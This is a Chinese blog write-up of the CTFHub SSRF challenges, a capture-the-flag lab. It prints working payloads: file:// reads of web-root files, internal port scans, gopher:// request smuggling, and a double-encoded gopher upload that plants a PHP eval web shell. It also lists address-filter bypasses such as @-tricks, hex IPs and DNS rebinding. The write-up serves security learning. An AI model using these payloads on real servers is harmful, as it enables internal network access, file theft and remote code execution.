初识CTF Day4 CTFHUBSSRF

最新推荐文章于 2024-05-21 22:07:05 发布
最新推荐文章于 2024-05-21 22:07:05 发布
阅读量2.1k 收藏 1
点赞数
分类专栏: CTFHUB 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58325155/article/details/120538344
版权

前言
这一次是对ssrf的探索,ctfhub技能树web就快结束了,期待淦进阶
从post开始,多谢了csdn大佬的博客,那个文章写的非常好,相较于我的会更加专业
这里附上链接https://blog.csdn.net/rfrder/article/details/108589988,感谢
若是纯纯的新手,那还是往下看吧,大佬们可以直接点击链接,不喜勿喷
正文

SSRF

内网访问

题目告诉访问127就直接访问下试试,但是没想到这么简单
?url=127.0.0.1/flag.php
1

伪协议读取文件

题目提示:尝试去读取一下Web目录下的flag.php吧
可以联想到web目录一般是存放在 var/www/html/ 里面
所以payload如下
?url=file:///var/www/html/flag.php
进入该页面,查看页面源代码得到flag

端口扫描

题目提示:来来来性感CTFHub在线扫端口,据说端口范围是8000-9000哦,
所以直接开始构造payload,然后抓包跑包
?url=127.0.0.1:80
将端口号,即80的位置改为8000到9000的所有数字
跑包返回值不同的极有可能是flag,所以点开看下返回包
在这里插入图片描述成功得到flag,本题结束

POST请求

进入题目后首先从127.0.0.1访问下flag.php
?url=127.0.0.1/flag.php
发现页面只有一个框框,输入任意数值回车,网页提示Just View From 127.0.0.1
返回框框页面,查看源代码得到key,现在还不知道key有什么用
在这里插入图片描述回去看了一眼题目描述
这次是发一个HTTP POST请求.对了.ssrf是用php的curl实现的.并且会跟踪302跳转.

抓个包看看,但是没看出来什么东西
参照了大佬的解法,发现里面需要使用gopher协议
上网查了下这个协议

Gopher协议格式:

URL:gopher://:/_后接TCP数据流

gopher的默认端口是70如果发起post请求,回车换行需要使用%0d%0a,如果多个参数,参数之间的&也需要进行URL编码
具体请参照https://baijiahao.baidu.com/s?id=1666024412704315446&wfr=spider&for=pc

但是实在是没有搞懂,就先把大佬编译好的payload拿来用了,去url解码了两次得到最初的构造:

GET /?url=gopher://127.0.0.1:80/_POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

key=67b35d0520e528b57f27a44fd80b939e HTTP/1.1

对burp进行相应的修改,发包,发现???
ctfhub{b644d27a30b450b2f170c4f19ef1dd85fb1efc5d}
也不知道为啥直接就出flag了
在这里插入图片描述但是这是个假flag
在这里插入图片描述。。。。这里已经重启环境四次了,我实在不想写了,若是以后学习到了一定会回来补上

啊哈!,经过了十分钟的修WiFi历程,我再次尝试,他出现了!!!!!!
在这里插入图片描述payload如下:
?url=gopher://127.0.0.1:80/_POST%2520%252Fflag.php%2520HTTP%252F1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Type%253A%2520application%252Fx-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250A%250D%250Akey%253Da2e0f4b14e5663c30ec2a8396592e563%20HTTP/1.1

最简单的就是把大佬的payload拿过来改成自己的key值这里加粗的部分就是key
把这个东西直接贴到url中即可
我个菜鸟就只能先这么做了,以后一定会深入研究ssrf的,但可能是很久以后。。。

上传文件

这道题目困扰了好久,终于解出来了
参考了多份wp,但是参考的太多了就不一一列举了
这里附带上最容易操作的一篇,感谢大佬的博客
https://senimo.blog.csdn.net/article/details/118464358
下面是解题过程

在这里插入图片描述这里有个文件上传的功能,但是没有提交的按钮,所以用前端代码写一个

<input type="submit" name="submit">

在这里插入图片描述然后使用burp抓包,将Host改为Host: 127.0.0.1:80
将包中的全部内容复制到url编码器中进行编码

在这里插入图片描述这是首次编码的结果
POST%20%2fflag.php%20HTTP%2f1.1%0AHost:%20127.0.0.1:80%0AUser-Agent:%20Mozilla%2f5.0%20(Windows%20NT%2010.0;%20Win64;%20x64;%20rv:84.0)%20Gecko%2f20100101%20Firefox%2f84.0%0AAccept:%20text%2fhtml,application%2fxhtml%2bxml,application%2fxml;q=0.9,image%2fwebp,%2a%2f%2a;q=0.8%0AAccept-Language:%20zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2%0AAccept-Encoding:%20gzip,%20deflate%0AContent-Type:%20multipart%2fform-data;%20boundary=---------------------------15947531109096836272552357223%0AContent-Length:%20362%0AOrigin:%20http:%2f%2fchallenge-609d142b748d1a4f.sandbox.ctfhub.com:10800%0AConnection:%20close%0AReferer:%20http:%2f%2fchallenge-609d142b748d1a4f.sandbox.ctfhub.com:10800%2f?url=127.0.0.1%2fflag.php%0ACookie:%20UM_distinctid=17c0c6a2f3120f-0b6e3eac15808f8-4c3f207e-144000-17c0c6a2f33689%0AUpgrade-Insecure-Requests:%201%0A%0A-----------------------------15947531109096836272552357223%0AContent-Disposition:%20form-data;%20name=%22file%22;%20filename=%221.txt%22%0AContent-Type:%20text%2fplain%0A%0A%3C?php%20eval%20REQUEST(8)%20?%3E%0A-----------------------------15947531109096836272552357223%0AContent-Disposition:%20form-data;%20name=%22submit%22%0A%0A%C3%A6%C2%8F%C2%90%C3%A4%C2%BA%C2%A4%C3%A6%C2%9F%C2%A5%C3%A8%C2%AF%C2%A2%0A-----------------------------15947531109096836272552357223--%0A

然后进行替换,将%0A替换为%0D%0A
在这里插入图片描述再进行第二次编码,下面是结果在这里插入图片描述

POST%2520%252fflag.php%2520HTTP%252f1.1%250D%250AHost:%2520127.0.0.1:80%250D%250AUser-Agent:%2520Mozilla%252f5.0%2520(Windows%2520NT%252010.0;%2520Win64;%2520x64;%2520rv:84.0)%2520Gecko%252f20100101%2520Firefox%252f84.0%250D%250AAccept:%2520text%252fhtml,application%252fxhtml%252bxml,application%252fxml;q=0.9,image%252fwebp,%252a%252f%252a;q=0.8%250D%250AAccept-Language:%2520zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2%250D%250AAccept-Encoding:%2520gzip,%2520deflate%250D%250AContent-Type:%2520multipart%252fform-data;%2520boundary=---------------------------15947531109096836272552357223%250D%250AContent-Length:%2520362%250D%250AOrigin:%2520http:%252f%252fchallenge-609d142b748d1a4f.sandbox.ctfhub.com:10800%250D%250AConnection:%2520close%250D%250AReferer:%2520http:%252f%252fchallenge-609d142b748d1a4f.sandbox.ctfhub.com:10800%252f?url=127.0.0.1%252fflag.php%250D%250ACookie:%2520UM_distinctid=17c0c6a2f3120f-0b6e3eac15808f8-4c3f207e-144000-17c0c6a2f33689%250D%250AUpgrade-Insecure-Requests:%25201%250D%250A%250D%250A-----------------------------15947531109096836272552357223%250D%250AContent-Disposition:%2520form-data;%2520name=%2522file%2522;%2520filename=%25221.txt%2522%250D%250AContent-Type:%2520text%252fplain%250D%250A%250D%250A%253C?php%2520eval%2520REQUEST(8)%2520?%253E%250D%250A-----------------------------15947531109096836272552357223%250D%250AContent-Disposition:%2520form-data;%2520name=%2522submit%2522%250D%250A%250D%250A%25C3%25A6%25C2%258F%25C2%2590%25C3%25A4%25C2%25BA%25C2%25A4%25C3%25A6%25C2%259F%25C2%25A5%25C3%25A8%25C2%25AF%25C2%25A2%250D%250A-----------------------------15947531109096836272552357223--%250D%250A

之后到初始页面抓个包
在这里插入图片描述使用gather进行请求,将最初页面抓到的数据包改为这个样子,如下图
在这里插入图片描述payload格式:
gopher://127.0.0.1:80/_编码

当然这里也可以不抓包,直接放到url里面,如下图
在这里插入图片描述
我的payload:(这里我放的是整个数据包的内容哦)

GET /?url=gopher://127.0.0.1:80/_POST%2520%252fflag.php%2520HTTP%252f1.1%250D%250AHost:%2520127.0.0.1:80%250D%250AUser-Agent:%2520Mozilla%252f5.0%2520(Windows%2520NT%252010.0;%2520Win64;%2520x64;%2520rv:84.0)%2520Gecko%252f20100101%2520Firefox%252f84.0%250D%250AAccept:%2520text%252fhtml,application%252fxhtml%252bxml,application%252fxml;q=0.9,image%252fwebp,%252a%252f%252a;q=0.8%250D%250AAccept-Language:%2520zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2%250D%250AAccept-Encoding:%2520gzip,%2520deflate%250D%250AContent-Type:%2520multipart%252fform-data;%2520boundary=---------------------------15947531109096836272552357223%250D%250AContent-Length:%2520362%250D%250AOrigin:%2520http:%252f%252fchallenge-609d142b748d1a4f.sandbox.ctfhub.com:10800%250D%250AConnection:%2520close%250D%250AReferer:%2520http:%252f%252fchallenge-609d142b748d1a4f.sandbox.ctfhub.com:10800%252f?url=127.0.0.1%252fflag.php%250D%250ACookie:%2520UM_distinctid=17c0c6a2f3120f-0b6e3eac15808f8-4c3f207e-144000-17c0c6a2f33689%250D%250AUpgrade-Insecure-Requests:%25201%250D%250A%250D%250A-----------------------------15947531109096836272552357223%250D%250AContent-Disposition:%2520form-data;%2520name=%2522file%2522;%2520filename=%25221.txt%2522%250D%250AContent-Type:%2520text%252fplain%250D%250A%250D%250A%253C?php%2520eval%2520REQUEST(8)%2520?%253E%250D%250A-----------------------------15947531109096836272552357223%250D%250AContent-Disposition:%2520form-data;%2520name=%2522submit%2522%250D%250A%250D%250A%25C3%25A6%25C2%258F%25C2%2590%25C3%25A4%25C2%25BA%25C2%25A4%25C3%25A6%25C2%259F%25C2%25A5%25C3%25A8%25C2%25AF%25C2%25A2%250D%250A-----------------------------15947531109096836272552357223--%250D%250A HTTP/1.1
Host: challenge-609d142b748d1a4f.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: UM_distinctid=17c0c6a2f3120f-0b6e3eac15808f8-4c3f207e-144000-17c0c6a2f33689
Upgrade-Insecure-Requests: 1

得到flag,该题目结束

FastCGI协议

题目中给了一个附件https://blog.csdn.net/mysteryflower/article/details/94386461是一篇讲解Fastcgi协议的博客
大家可以去先阅读一下(先不要开题目,会计时的)
这题没解出来,因为没有安装fastcgi服务
等我装好后一定回来更新这题
这里给出大佬的文章供大家参考
https://blog.csdn.net/qq_51652864/article/details/118697060?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522163315614516780255298591%2522%252C%2522scm%2522%253A%252220140713.130102334…%2522%257D&request_id=163315614516780255298591&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2allsobaiduend~default-1-118697060.first_rank_v2_pc_rank_v29&utm_term=ctfhubFastCGI%E5%8D%8F%E8%AE%AE&spm=1018.2226.3001.4187

Redis协议

这里我也不会做。。。
附带上wp(我的水平还是不会操作,还有待学习)
https://blog.csdn.net/rfrder/article/details/108589988

URL Bypass

参考大佬的文章得知
http://www.baidu.com@192.168.0.1/与http://192.168.0.1请求的都是192.168.0.1的内容
现在我的水平先不讨论原理,就先功利一些,知道怎么做题就行了
大致上就是域名+@+内网地址实现SSRF
payload:
?url=http://notfound.ctfhub.com@127.0.0.1/flag.php
在这里插入图片描述(看到这种题目我又再次燃起了ctf的希望,也许我可以做个签到题)

数字IP Bypass

这里直接访问127.0.0.1/flag.php,网页提示127,172,@都被ban(封禁)了
很明显不可以使用上题的方法进行解题
在这里插入图片描述ip地址有十进制和十六进制两种表示方式,所以这里可以使用十六进制进行绕过
在这里插入图片描述在这里插入图片描述
成功得到flag

302跳转 Bypass

直接访问127.0.0.1/flag.php,页面如下图
在这里插入图片描述
读取一下代码
在这里插入图片描述但不知为啥我读取不到,网上的师傅们都可以拿到,我裂开来
算了,直接尝试localhost绕过
在这里插入图片描述成功拿到flag

DNS重绑定 Bypass

这里附带上附件地址https://zhuanlan.zhihu.com/p/89426041
在这里插入图片描述
还用到一个地址,是用来绑定两个域名的https://lock.cmpxchg8b.com/rebinder.html

在这里插入图片描述成功拿到flag

在这里插入图片描述
总结
在这里插入图片描述
(最后做成了这样,Redis看wp没看不明白这么用那个脚本,所以就没有做这个题目)

左边这三个都是比较简单的运用的语句也就是下面这三条
?url=127.0.0.1/flag.php
?url=file:///var/www/html/flag.php
?url=127.0.0.1:80
是比较简单的SSRF

中间的这四道题是最有技术含量的了,可是我现在还没有技术,不配独立做出他们
前面的两个是通过gother协议去解题,需要进行url编码绕过,没有涉及到环境和脚本,相对于下面那两道题目而言算是简单的

右边的四道题目可以总结成对于内网地址的绕过
方法如下:

  1. 通过 域名@内网地址 的方式绕过
  2. 通过 十六进制编码 的方式绕过
  3. 通过 localhost 的方式绕过
  4. 通过 DNS重定向 的方式绕过

其中稍有难度的是第四种,使用一个域名绑定了两个IP地址,转换地址为https://zhuanlan.zhihu.com/p/89426041

后话
这样对于SSRF的初步探索就算暂时结束了,那两个题目一定会找时间再做出来的,也会在这篇文章中进行更新,那些做出来的题目,我认为已经算是比较详细的了,类似于手把手解题,若以上有没做出来的题目可以评论区留言或者私信我,拜拜啦

suxinAL
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Ctfhub解题 web SSRF(未完待续)
weixin_46703850的博客
03-21 988
Ctfhub解题 web SSRF(未完待续)
CTF之web学习记录 -- SSRF
lifanxin的博客
06-29 1883
SSRF概述SSRF原理SSRF漏洞修复一道例题总结 概述   SSRF(Server-Side Request Forgery)服务器端请求伪造,是一种由攻击者构造请求,服务器端发起请求的安全漏洞。当然之所以要这样曲折,是因为SSRF的目标一般是外网无法访问的内部系统,所以需要用服务器端发送。 SSRF原理   SSRF形成的原因在于服务器端提供了从其它服务器应用获取数据的功能且没有对目标地址做过滤和限制。通过该漏洞我们可以攻击内网的服务器,获取相应的资源信息,利用file协议读取内部网络文件等。   如
CTFHub -web-ssrf总结 (除去fastcgi和redis)超详细
m0_62879498的博客
02-11 2265
CTFHub -web-ssrf 练习总结 一,内网访问 尝试访问位于127.0.0.1的flag.php吧 所以我们可以直接构建url: /?url=http://127.0.0.1/flag.php 进行访问即可成功 二,为协议读取文件 尝试去读取一下Web目录下的flag.php吧 我们先尝试 ?url=http://127.0.0.1/flag.php 发现访问不见 这道题说白了是让我们访问本地计算机的web文件 所以我们使用 file 协议读取构造: /url=file:///var/ww
CTFHUB技能树——SSRF(一)
最新发布
2401_82985722的博客
05-21 1151
大多是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。(7)从URL关键字中寻找(share、wap、url、link、src、source、target、u、display、sourceURl、imageURL、domain)(1)可以对外网、内网、本地进行端口扫描,某些情况下端口的Banner会回显出来(比如3306的);(5)使用file:///协议读取本地文件(或其他协议)
浅谈ssrf与ctf那些事
蚁景网安学院
10-23 7352
亲爱的,关注我吧10/23文章共计6693个词预计阅读12分钟来和我一起阅读吧前言有关SSRF(Server-Side Request Forgery:服务器端请求伪造)介绍的文章很多了...
CTFHUB技能树-SSRF【持续更新】
qq_33295410的博客
09-16 6995
CTFHUB SSRF POST请求首先开始解题构造gopher数据构造获取flag的请求 POST请求 最近ctfhub新添加了一些题目,看到有ssrf的题目便去试了一下,前面几个都比较简单就暂时先不写,post 请求那个折腾了几天终于弄懂了,把过程记录下。 首先 我们看下题目描述,这个肯定是不能错过的。 描述:这次是发一个HTTP POST请求.对了.ssrf是用php的curl实现的.并且会跟踪302跳转.我准备了一个302.php,可能对你有用哦 开始解题 我们打开题目,发现了flag.php 3
CTF初识之Misc(更正版).pptx
10-19
CTF入门资源_Misc_PPT
CTF题库超详细资源合集
06-14
ctf题库 CTF 题⽬类型⼀般分为 Web 渗透、RE 逆向、Misc 杂项、PWN ⼆进制漏洞利⽤、Crypto 密码破译。 在传统的CTF线上⽐赛中,Web类题⽬是主要的题型之⼀,相较于⼆进制、逆向等类型的题⽬,参赛者不需掌握系统...
CTF之GIF图片分离工具
02-23
misc方向直接GIF图片分离
ctf:p4团队的ctf解决方案
02-05
P4小组的CTF撰写 2020年 2019年 2018年 2017年 2017.10.01 DefCamp D-CTF 2017 Quals (第5名/ 471队) 2017.03.25 InsomniHack 2017 (第七名/ 68组)现场 2016年 2016.01.23 2016年突破(第二名/ 152个...
CTF100题.docx
05-25
CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符...
CTFHUB POST
山兔的博客
09-12 791
一、POST 这次是发一个HTTP POST请求。对了.ssrf是用php的curl实现的,并且会跟踪302跳转.加油吧骚年。 1.什么是gopher协议 Gopher是Internet上一个信息查找系统,它将Internet上的文件组织成某种索引,方便用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具。使用tcp70端口。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它;gopher协议支持发出GET、POST请求
CTFHUB SSRF POST小记
I_WORM的博客
02-02 1361
ctfhub ssrf post小记
【web-ctfctf-pikachu-ssrf
一个努力生活的人的博客
08-23 1101
ctf-pikachu-ssrf
CTFer成长之路之SSRF漏洞
02-22 666
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
CTFHub-Web-SSRF练习
Atkx's Blog
10-18 6175
这里写自定义目录标题内网访问伪协议读取文件端口扫描POST请求上传文件FastCGI协议 内网访问 题目描述:尝试访问位于127.0.0.1的flag.php吧 访问靶机地址,发现url后面多了/?url=_ 然后访问127.0.0.1/flag.php Payload: ?url=127.0.0.1/flag.php 伪协议读取文件 题目描述:尝试去读取一下Web目录下的flag.php吧 在SSRF中常用的伪协议是file:///协议,其在ssrf中可以用来读取php源码。 Payload
CTFHUB SSRF 【全】
Jay17的博客
04-17 1263
CTFHUB SSRF 题解 【全】
ctf_show笔记篇(web入门---SSRF)
whale_waves的博客
04-04 845
ssrf产生原理: 服务端存在网络请求功能/函数,例如:file_get_contens()这一类类似于curl 这种函数传入的参数用户是可控的 没有对用户输入做过滤导致的ssrf漏洞 ssrf利用: 用于探测内网服务以及端口 探针存活主机以及开放服务 探针是否存在redis服务(未授权访问, 相当于是可以访问到redis服务并且开发人员不严谨没有设置密码, 因为默认是没有密码的, 或者说开发者设置了密码但是是弱口令), 利用定时任务反弹shell
CTF刷题记录Buuctf-N1BOOK-SSRF
m_de_g的博客
06-23 1447
** N1BOOK-SQL2 ** 一、解题思路 1.查看页面源代码,发现了challenge.php 2.在进行ssrf攻击之前,先进行一波代码审计 3.根据题目要求,访问本机的flag.php,本道题是用了白名单的方式,通过parse_url()后分解出来的IP不能为白名单内的IP,所以我们主要需要绕过parse_url(),在线php调试 4.构造的payload为:http://fghkk@127.0.0.1:80@baidu.com/flag.php 5.当我使用get传参的方式时,
ctf初识之misc(更正版)
04-28
CTF(即Capture The Flag)是网络安全领域中的比赛,吸引了全球许多安全爱好者参与。CTF可以分为pwn、web、re、crypto、misc等多种题型,其中misc是相对综合的一种类型。 Misc题目可能包括密码学、隐写术、逆向工程、杂项等多种技能点,解题需要具备全面的技能储备和各种技巧的运用。比如可以运用python脚本解读二进制、分析图片、分析音频等。此外,对于杂项,通常需要求助于各种工具和文档。因此解套路misc题目的方式则是:通过各种常见的工具对附件进行扫描,寻找线索;通过代码分析或它人思路分享了解更深层次的内容。这也正是解决misc题目的一般流程。 除此之外,团队合作和沟通也是解题过程中不可或缺的一部分。因为比赛限定时间,通常需要团队之间合作,互相协助解题。团队成员之间应该时刻保持沟通,分享各自的思考和进展,避免重复劳动,以通关作战更高效。 在CTF初识之misc的过程中,可以通过尝试各种不同类型的misc题目,如杀软绕过、web安全、加密解密等,来增强自己杂项题解决的能力。与此同时,可以积极参加线下比赛和社区活动,多结识同行,并关注有关CTF的相关新闻和资讯,以提高自己的技能水平。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值